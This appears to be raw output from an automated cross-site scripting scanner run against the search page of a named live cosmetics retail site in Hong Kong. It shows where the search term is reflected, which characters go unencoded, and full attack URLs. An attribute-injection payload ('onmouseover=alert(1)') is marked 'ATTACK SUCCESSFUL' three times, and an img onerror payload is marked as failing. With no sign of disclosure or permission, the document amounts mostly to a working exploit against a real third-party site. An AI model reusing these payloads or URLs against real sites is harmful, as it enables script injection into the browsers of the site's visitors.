https://www.urbandecay.com.hk/

GET Params:[1]
['q']
_______________________________________________________________________________________________________
https://www.urbandecay.com.hk/on/demandware.store/Sites-urbandecay-hk-Site/zh_HK/Search-Show?q=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [3]
<option value="/on/demandware.store/Sites-urbandecay-hk-Site/zh_HK/Search-Show?q=(uvw&quot;xyz'yxz&lt;/zxy" selected>
<option value="/on/demandware.store/Sites-urbandecay-hk-Site/en_HK/Search-Show?q=(uvw&quot;xyz'yxz&lt;/zxy" >
<ul class="breadcrumb t-test1" data-js-analytics="主頁::(uvw&quot;xyz'yxz&lt;/zxy " itemscope itemtype="http://schema.org/BreadcrumbList">

----------------------------------------------------------------------------------
HTML Context: [2]
<span itemprop="name">
(uvw"xyz'yxz</zxy 
</span>
<span class="no_hits_search_term">
            &#40;uvw&quot;xyz&#39;yxz&lt;/zxy
        </span>

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [5]
<a href="/on/demandware.store/Sites-urbandecay-hk-Site/en_HK/Search-Show?q=(uvw&quot;xyz'yxz&lt;/zxy">
<a class=" " href="/on/demandware.store/Sites-urbandecay-hk-Site/zh_HK/Search-Show?q=%28uvw%22xyz%27yxz%3c%2fzxy" title="(uvw&quot;xyz'yxz&lt;/zxy" itemprop="item">
<link rel="canonical" href="https://www.urbandecay.com.hk/on/demandware.store/Sites-urbandecay-hk-Site/zh_HK/Search-Show?q=%28uvw%22xyz%27yxz%3c%2fzxy&amp;cgid=&amp;cid=" />
<link rel="alternate" hreflang="zh-hk" href="https://www.urbandecay.com.hk/on/demandware.store/Sites-urbandecay-hk-Site/zh_HK/Search-Show?q=%28uvw%22xyz%27yxz%3c%2fzxy&amp;cgid=&amp;cid=" />
<link rel="alternate" hreflang="en-hk" href="https://www.urbandecay.com.hk/on/demandware.store/Sites-urbandecay-hk-Site/en_HK/Search-Show?q=%28uvw%22xyz%27yxz%3c%2fzxy&amp;cgid=&amp;cid=" />

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.urbandecay.com.hk/on/demandware.store/Sites-urbandecay-hk-Site/zh_HK/Search-Show?q=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
b'<ul class="breadcrumb t-test1" data-js-analytics="\xe4\xb8\xbb\xe9\xa0\x81::\' onmouseover=\'alert(1) " itemscope itemtype="http://schema.org/BreadcrumbList">\n'
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.urbandecay.com.hk/on/demandware.store/Sites-urbandecay-hk-Site/zh_HK/Search-Show?q=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
b'<ul class="breadcrumb t-test1" data-js-analytics="\xe4\xb8\xbb\xe9\xa0\x81::\' onmouseover=\'alert(1) " itemscope itemtype="http://schema.org/BreadcrumbList">\n'
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.urbandecay.com.hk/on/demandware.store/Sites-urbandecay-hk-Site/zh_HK/Search-Show?q=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
b'<ul class="breadcrumb t-test1" data-js-analytics="\xe4\xb8\xbb\xe9\xa0\x81::\' onmouseover=\'alert(1) " itemscope itemtype="http://schema.org/BreadcrumbList">\n'
ENCODING     Presence	"	'	<	( 
HTML:		True	False	False	False	False

Attack Payloads for HTML
['<img src=x onerror="alert(1)">']

HTML Attack Url: https://www.urbandecay.com.hk/on/demandware.store/Sites-urbandecay-hk-Site/zh_HK/Search-Show?q=<img src=x onerror="alert(1)">

 ______ UnSuccessful with payload: <img src=x onerror="alert(1)">

ENCODING     Presence	"	'	<	( 
HTML:		True	True	True	True	True

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
